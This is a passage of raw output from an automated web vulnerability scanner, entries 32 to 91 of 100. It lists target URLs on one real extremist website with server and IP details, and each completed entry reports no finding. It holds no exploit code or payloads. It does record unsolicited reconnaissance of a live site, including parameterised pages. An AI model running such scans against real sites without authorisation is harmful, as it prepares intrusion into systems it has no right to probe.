  1235. |_[ + ] More details::
  1236. |_[ + ] Found:: UNIDENTIFIED
  1237.  
  1238. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1239. |_[ + ] [ 32 / 100 ]-[03:32:49] [ - ]
  1240. |_[ + ] Target:: [ https://www.americannaziparty.com/White_Power_html/White_Power/Chapter_6.html ]
  1241. |_[ + ] Exploit::
  1242. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1243. |_[ + ] More details::
  1244. |_[ + ] Found:: UNIDENTIFIED
  1245.  
  1246. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1247. |_[ + ] [ 33 / 100 ]-[03:32:50] [ - ]
  1248. |_[ + ] Target:: [ https://www.americannaziparty.com/Mein_Kampf_html/Mein_Kampf/Chapter_1_7.html ]
  1249. |_[ + ] Exploit::
  1250. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1251. |_[ + ] More details::
  1252. |_[ + ] Found:: UNIDENTIFIED
  1253.  
  1254. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1255. |_[ + ] [ 34 / 100 ]-[03:32:50] [ - ]
  1256. |_[ + ] Target:: [ https://www.americannaziparty.com/White_Power_html/White_Power/Chapter_14.html ]
  1257. |_[ + ] Exploit::
  1258. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1259. |_[ + ] More details::
  1260. |_[ + ] Found:: UNIDENTIFIED
  1261.  
  1262. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1263. |_[ + ] [ 35 / 100 ]-[03:32:50] [ - ]
  1264. |_[ + ] Target:: [ https://www.americannaziparty.com/Mein_Kampf_html/Mein_Kampf/Chapter_2_14.html ]
  1265. |_[ + ] Exploit::
  1266. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1267. |_[ + ] More details::
  1268. |_[ + ] Found:: UNIDENTIFIED
  1269.  
  1270. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1271. |_[ + ] [ 36 / 100 ]-[03:32:51] [ - ]
  1272. |_[ + ] Target:: [ https://www.americannaziparty.com/White_Power_html/White_Power/Chapter_2.html ]
  1273. |_[ + ] Exploit::
  1274. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1275. |_[ + ] More details::
  1276. |_[ + ] Found:: UNIDENTIFIED
  1277.  
  1278. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1279. |_[ + ] [ 37 / 100 ]-[03:32:51] [ - ]
  1280. |_[ + ] Target:: [ https://www.americannaziparty.com/White_Power_html/White_Power/Chapter_11.html ]
  1281. |_[ + ] Exploit::
  1282. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1283. |_[ + ] More details::
  1284. |_[ + ] Found:: UNIDENTIFIED
  1285.  
  1286. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1287. |_[ + ] [ 38 / 100 ]-[03:32:51] [ - ]
  1288. |_[ + ] Target:: [ https://www.americannaziparty.com/White_Power_html/White_Power/Chapter_10.html ]
  1289. |_[ + ] Exploit::
  1290. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1291. |_[ + ] More details::
  1292. |_[ + ] Found:: UNIDENTIFIED
  1293.  
  1294. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1295. |_[ + ] [ 39 / 100 ]-[03:32:52] [ - ]
  1296. |_[ + ] Target:: [ https://www.americannaziparty.com/White_Power_html/White_Power/Chapter_1.html ]
  1297. |_[ + ] Exploit::
  1298. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1299. |_[ + ] More details::
  1300. |_[ + ] Found:: UNIDENTIFIED
  1301.  
  1302. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1303. |_[ + ] [ 40 / 100 ]-[03:32:52] [ - ]
  1304. |_[ + ] Target:: [ http://www.americannaziparty.com/Mein_Kampf_html/Mein_Kampf/Chapter_2_8.html ]
  1305. |_[ + ] Exploit::
  1306. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1307. |_[ + ] More details::
  1308. |_[ + ] Found:: UNIDENTIFIED
  1309.  
  1310. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1311. |_[ + ] [ 41 / 100 ]-[03:32:53] [ - ]
  1312. |_[ + ] Target:: [ https://www.americannaziparty.com/White_Power_html/White_Power/Chapter_13.html ]
  1313. |_[ + ] Exploit::
  1314. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1315. |_[ + ] More details::
  1316. |_[ + ] Found:: UNIDENTIFIED
  1317.  
  1318. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1319. |_[ + ] [ 42 / 100 ]-[03:32:53] [ - ]
  1320. |_[ + ] Target:: [ https://www.americannaziparty.com/White_Power_html/White_Power/Chapter_9.html ]
  1321. |_[ + ] Exploit::
  1322. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1323. |_[ + ] More details::
  1324. |_[ + ] Found:: UNIDENTIFIED
  1325.  
  1326. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1327. |_[ + ] [ 43 / 100 ]-[03:32:54] [ - ]
  1328. |_[ + ] Target:: [ http://www.americannaziparty.com/support/gifs/Label3.pdf ]
  1329. |_[ + ] Exploit::
  1330. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1331. |_[ + ] More details::
  1332. |_[ + ] Found:: UNIDENTIFIED
  1333.  
  1334. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1335. |_[ + ] [ 44 / 100 ]-[03:32:55] [ - ]
  1336. |_[ + ] Target:: [ http://www.americannaziparty.com/support/gifs/Label2.pdf ]
  1337. |_[ + ] Exploit::
  1338. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1339. |_[ + ] More details::
  1340. |_[ + ] Found:: UNIDENTIFIED
  1341.  
  1342. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1343. |_[ + ] [ 45 / 100 ]-[03:32:55] [ - ]
  1344. |_[ + ] Target:: [ https://www.americannaziparty.com/Mein_Kampf_html/Mein_Kampf/index.html ]
  1345. |_[ + ] Exploit::
  1346. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1347. |_[ + ] More details::
  1348. |_[ + ] Found:: UNIDENTIFIED
  1349.  
  1350. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1351. |_[ + ] [ 46 / 100 ]-[03:32:55] [ - ]
  1352. |_[ + ] Target:: [ http://www.americannaziparty.com/rockwell/materials/index.php ]
  1353. |_[ + ] Exploit::
  1354. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1355. |_[ + ] More details::
  1356. |_[ + ] Found:: UNIDENTIFIED
  1357.  
  1358. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1359. |_[ + ] [ 47 / 100 ]-[03:32:56] [ - ]
  1360. |_[ + ] Target:: [ https://www.americannaziparty.com/White_Power_html/White_Power/index.html ]
  1361. |_[ + ] Exploit::
  1362. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1363. |_[ + ] More details::
  1364. |_[ + ] Found:: UNIDENTIFIED
  1365.  
  1366. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1367. |_[ + ] [ 48 / 100 ]-[03:32:56] [ - ]
  1368. |_[ + ] Target:: [ http://www.americannaziparty.com/rockwell/materials/articles/nightmare.php ]
  1369. |_[ + ] Exploit::
  1370. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1371. |_[ + ] More details::
  1372. |_[ + ] Found:: UNIDENTIFIED
  1373.  
  1374. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1375. |_[ + ] [ 49 / 100 ]-[03:32:56] [ - ]
  1376. |_[ + ] Target:: [ http://www.americannaziparty.com/rockwell/materials/articles/stand.php ]
  1377. |_[ + ] Exploit::
  1378. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1379. |_[ + ] More details::
  1380. |_[ + ] Found:: UNIDENTIFIED
  1381.  
  1382. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1383. |_[ + ] [ 50 / 100 ]-[03:32:56] [ - ]
  1384. |_[ + ] Target:: [ http://www.americannaziparty.com/rockwell/materials/articles/ducks.php ]
  1385. |_[ + ] Exploit::
  1386. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1387. |_[ + ] More details::
  1388. |_[ + ] Found:: UNIDENTIFIED
  1389.  
  1390. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1391. |_[ + ] [ 51 / 100 ]-[03:32:56] [ - ]
  1392. |_[ + ] Target:: [ http://www.americannaziparty.com/rockwell/materials/articles/tower.php ]
  1393. |_[ + ] Exploit::
  1394. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1395. |_[ + ] More details::
  1396. |_[ + ] Found:: UNIDENTIFIED
  1397.  
  1398. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1399. |_[ + ] [ 52 / 100 ]-[03:32:57] [ - ]
  1400. |_[ + ] Target:: [ http://www.americannaziparty.com/rockwell/materials/articles/vinces.php ]
  1401. |_[ + ] Exploit::
  1402. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1403. |_[ + ] More details::
  1404. |_[ + ] Found:: UNIDENTIFIED
  1405.  
  1406. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1407. |_[ + ] [ 53 / 100 ]-[03:32:57] [ - ]
  1408. |_[ + ] Target:: [ http://www.americannaziparty.com/about/MeinKampf english.pdf ]
  1409. |_[ + ] Exploit::
  1410. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1411. |_[ + ] More details::
  1412. |_[ + ] Found:: UNIDENTIFIED
  1413.  
  1414. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1415. |_[ + ] [ 54 / 100 ]-[03:32:57] [ - ]
  1416. |_[ + ] Target:: [ http://www.americannaziparty.com/rockwell/materials/articles/hate.php ]
  1417. |_[ + ] Exploit::
  1418. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1419. |_[ + ] More details::
  1420. |_[ + ] Found:: UNIDENTIFIED
  1421.  
  1422. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1423. |_[ + ] [ 55 / 100 ]-[03:32:57] [ - ]
  1424. |_[ + ] Target:: [ http://www.americannaziparty.com/rockwell/materials/articles/battlesong.php ]
  1425. |_[ + ] Exploit::
  1426. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1427. |_[ + ] More details::
  1428. |_[ + ] Found:: UNIDENTIFIED
  1429.  
  1430. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1431. |_[ + ] [ 56 / 100 ]-[03:32:57] [ - ]
  1432. |_[ + ] Target:: [ http://www.americannaziparty.com/rockwell/materials/books/WP/WP10.htm ]
  1433. |_[ + ] Exploit::
  1434. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1435. |_[ + ] More details::
  1436. |_[ + ] Found:: UNIDENTIFIED
  1437.  
  1438. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1439. |_[ + ] [ 57 / 100 ]-[03:32:58] [ - ]
  1440. |_[ + ] Target:: [ http://www.americannaziparty.com/rockwell/materials/books/TTTW/TTTW3.htm ]
  1441. |_[ + ] Exploit::
  1442. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1443. |_[ + ] More details::
  1444. |_[ + ] Found:: UNIDENTIFIED
  1445.  
  1446. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1447. |_[ + ] [ 58 / 100 ]-[03:32:58] [ - ]
  1448. |_[ + ] Target:: [ https://www.americannaziparty.com/rockwell/materials/books/pdf/WhitePower.pdf ]
  1449. |_[ + ] Exploit::
  1450. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1451. |_[ + ] More details::
  1452. |_[ + ] Found:: UNIDENTIFIED
  1453.  
  1454. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1455. |_[ + ] [ 59 / 100 ]-[03:32:58] [ - ]
  1456. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2005-06-12 ]
  1457. |_[ + ] Exploit::
  1458. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1459. |_[ + ] More details::
  1460. |_[ + ] Found:: UNIDENTIFIED
  1461.  
  1462. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1463. |_[ + ] [ 60 / 100 ]-[03:32:59] [ - ]
  1464. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2011-10-16 ]
  1465. |_[ + ] Exploit::
  1466. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1467. |_[ + ] More details::
  1468. |_[ + ] Found:: UNIDENTIFIED
  1469.  
  1470. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1471. |_[ + ] [ 61 / 100 ]-[03:32:59] [ - ]
  1472. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2014-03-14 ]
  1473. |_[ + ] Exploit::
  1474. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1475. |_[ + ] More details::
  1476. |_[ + ] Found:: UNIDENTIFIED
  1477.  
  1478. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1479. |_[ + ] [ 62 / 100 ]-[03:32:59] [ - ]
  1480. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2003-10-12 ]
  1481. |_[ + ] Exploit::
  1482. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1483. |_[ + ] More details::
  1484. |_[ + ] Found:: UNIDENTIFIED
  1485.  
  1486. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1487. |_[ + ] [ 63 / 100 ]-[03:32:59] [ - ]
  1488. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2016-01-06 ]
  1489. |_[ + ] Exploit::
  1490. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1491. |_[ + ] More details::
  1492. |_[ + ] Found:: UNIDENTIFIED
  1493.  
  1494. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1495. |_[ + ] [ 64 / 100 ]-[03:32:59] [ - ]
  1496. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2008-01-15 ]
  1497. |_[ + ] Exploit::
  1498. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1499. |_[ + ] More details::
  1500. |_[ + ] Found:: UNIDENTIFIED
  1501.  
  1502. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1503. |_[ + ] [ 65 / 100 ]-[03:32:59] [ - ]
  1504. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2010-10-12 ]
  1505. |_[ + ] Exploit::
  1506. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1507. |_[ + ] More details::
  1508. |_[ + ] Found:: UNIDENTIFIED
  1509.  
  1510. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1511. |_[ + ] [ 66 / 100 ]-[03:33:00] [ - ]
  1512. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2004-01-19 ]
  1513. |_[ + ] Exploit::
  1514. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1515. |_[ + ] More details::
  1516. |_[ + ] Found:: UNIDENTIFIED
  1517.  
  1518. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1519. |_[ + ] [ 67 / 100 ]-[03:33:00] [ - ]
  1520. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2014-05-02 ]
  1521. |_[ + ] Exploit::
  1522. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1523. |_[ + ] More details::
  1524. |_[ + ] Found:: UNIDENTIFIED
  1525.  
  1526. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1527. |_[ + ] [ 68 / 100 ]-[03:33:00] [ - ]
  1528. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2016-12-09 ]
  1529. |_[ + ] Exploit::
  1530. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1531. |_[ + ] More details::
  1532. |_[ + ] Found:: UNIDENTIFIED
  1533.  
  1534. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1535. |_[ + ] [ 69 / 100 ]-[03:33:00] [ - ]
  1536. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2004-01-11 ]
  1537. |_[ + ] Exploit::
  1538. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1539. |_[ + ] More details::
  1540. |_[ + ] Found:: UNIDENTIFIED
  1541.  
  1542. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1543. |_[ + ] [ 70 / 100 ]-[03:33:00] [ - ]
  1544. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2004-01-26 ]
  1545. |_[ + ] Exploit::
  1546. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1547. |_[ + ] More details::
  1548. |_[ + ] Found:: UNIDENTIFIED
  1549.  
  1550. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1551. |_[ + ] [ 71 / 100 ]-[03:33:01] [ - ]
  1552. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2006-07-04 ]
  1553. |_[ + ] Exploit::
  1554. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1555. |_[ + ] More details::
  1556. |_[ + ] Found:: UNIDENTIFIED
  1557.  
  1558. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1559. |_[ + ] [ 72 / 100 ]-[03:33:01] [ - ]
  1560. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2003-11-11 ]
  1561. |_[ + ] Exploit::
  1562. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1563. |_[ + ] More details::
  1564. |_[ + ] Found:: UNIDENTIFIED
  1565.  
  1566. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1567. |_[ + ] [ 73 / 100 ]-[03:33:01] [ - ]
  1568. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2012-09-11 ]
  1569. |_[ + ] Exploit::
  1570. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1571. |_[ + ] More details::
  1572. |_[ + ] Found:: UNIDENTIFIED
  1573.  
  1574. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1575. |_[ + ] [ 74 / 100 ]-[03:33:01] [ - ]
  1576. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2004-11-01 ]
  1577. |_[ + ] Exploit::
  1578. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1579. |_[ + ] More details::
  1580. |_[ + ] Found:: UNIDENTIFIED
  1581.  
  1582. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1583. |_[ + ] [ 75 / 100 ]-[03:33:01] [ - ]
  1584. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2003-10-06 ]
  1585. |_[ + ] Exploit::
  1586. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1587. |_[ + ] More details::
  1588. |_[ + ] Found:: UNIDENTIFIED
  1589.  
  1590. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1591. |_[ + ] [ 76 / 100 ]-[03:33:01] [ - ]
  1592. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2015-08-20 ]
  1593. |_[ + ] Exploit::
  1594. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1595. |_[ + ] More details::
  1596. |_[ + ] Found:: UNIDENTIFIED
  1597.  
  1598. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1599. |_[ + ] [ 77 / 100 ]-[03:33:02] [ - ]
  1600. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2004-04-08 ]
  1601. |_[ + ] Exploit::
  1602. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1603. |_[ + ] More details::
  1604. |_[ + ] Found:: UNIDENTIFIED
  1605.  
  1606. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1607. |_[ + ] [ 78 / 100 ]-[03:33:02] [ - ]
  1608. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2015-11-19 ]
  1609. |_[ + ] Exploit::
  1610. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1611. |_[ + ] More details::
  1612. |_[ + ] Found:: UNIDENTIFIED
  1613.  
  1614. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1615. |_[ + ] [ 79 / 100 ]-[03:33:02] [ - ]
  1616. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2007-09-16 ]
  1617. |_[ + ] Exploit::
  1618. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1619. |_[ + ] More details::
  1620. |_[ + ] Found:: UNIDENTIFIED
  1621.  
  1622. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1623. |_[ + ] [ 80 / 100 ]-[03:33:03] [ - ]
  1624. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2015-07-18 ]
  1625. |_[ + ] Exploit::
  1626. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1627. |_[ + ] More details::
  1628. |_[ + ] Found:: UNIDENTIFIED
  1629.  
  1630. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1631. |_[ + ] [ 81 / 100 ]-[03:33:03] [ - ]
  1632. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2006-10-03 ]
  1633. |_[ + ] Exploit::
  1634. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1635. |_[ + ] More details::
  1636. |_[ + ] Found:: UNIDENTIFIED
  1637.  
  1638. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1639. |_[ + ] [ 82 / 100 ]-[03:33:03] [ - ]
  1640. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2010-06-10 ]
  1641. |_[ + ] Exploit::
  1642. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1643. |_[ + ] More details::
  1644. |_[ + ] Found:: UNIDENTIFIED
  1645.  
  1646. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1647. |_[ + ] [ 83 / 100 ]-[03:33:03] [ - ]
  1648. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2013-12-03 ]
  1649. |_[ + ] Exploit::
  1650. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1651. |_[ + ] More details::
  1652. |_[ + ] Found:: UNIDENTIFIED
  1653.  
  1654. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1655. |_[ + ] [ 84 / 100 ]-[03:33:03] [ - ]
  1656. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2015-04-22 ]
  1657. |_[ + ] Exploit::
  1658. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1659. |_[ + ] More details::
  1660. |_[ + ] Found:: UNIDENTIFIED
  1661.  
  1662. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1663. |_[ + ] [ 85 / 100 ]-[03:33:04] [ - ]
  1664. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2007-10-16 ]
  1665. |_[ + ] Exploit::
  1666. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1667. |_[ + ] More details::
  1668. |_[ + ] Found:: UNIDENTIFIED
  1669.  
  1670. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1671. |_[ + ] [ 86 / 100 ]-[03:33:04] [ - ]
  1672. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2006-02-26 ]
  1673. |_[ + ] Exploit::
  1674. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1675. |_[ + ] More details::
  1676. |_[ + ] Found:: UNIDENTIFIED
  1677.  
  1678. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1679. |_[ + ] [ 87 / 100 ]-[03:33:04] [ - ]
  1680. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2012-11-05 ]
  1681. |_[ + ] Exploit::
  1682. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1683. |_[ + ] More details::
  1684. |_[ + ] Found:: UNIDENTIFIED
  1685.  
  1686. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1687. |_[ + ] [ 88 / 100 ]-[03:33:04] [ - ]
  1688. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2010-12-08 ]
  1689. |_[ + ] Exploit::
  1690. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1691. |_[ + ] More details::
  1692. |_[ + ] Found:: UNIDENTIFIED
  1693.  
  1694. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1695. |_[ + ] [ 89 / 100 ]-[03:33:04] [ - ]
  1696. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2004-12-23 ]
  1697. |_[ + ] Exploit::
  1698. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1699. |_[ + ] More details::
  1700. |_[ + ] Found:: UNIDENTIFIED
  1701.  
  1702. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1703. |_[ + ] [ 90 / 100 ]-[03:33:04] [ - ]
  1704. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2003-09-13 ]
  1705. |_[ + ] Exploit::
  1706. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1707. |_[ + ] More details::
  1708. |_[ + ] Found:: UNIDENTIFIED
  1709.  
  1710. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1711. |_[ + ] [ 91 / 100 ]-[03:33:05] [ - ]
  1712. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2017-06-11 ]
  1713. |_[ + ] Exploit::
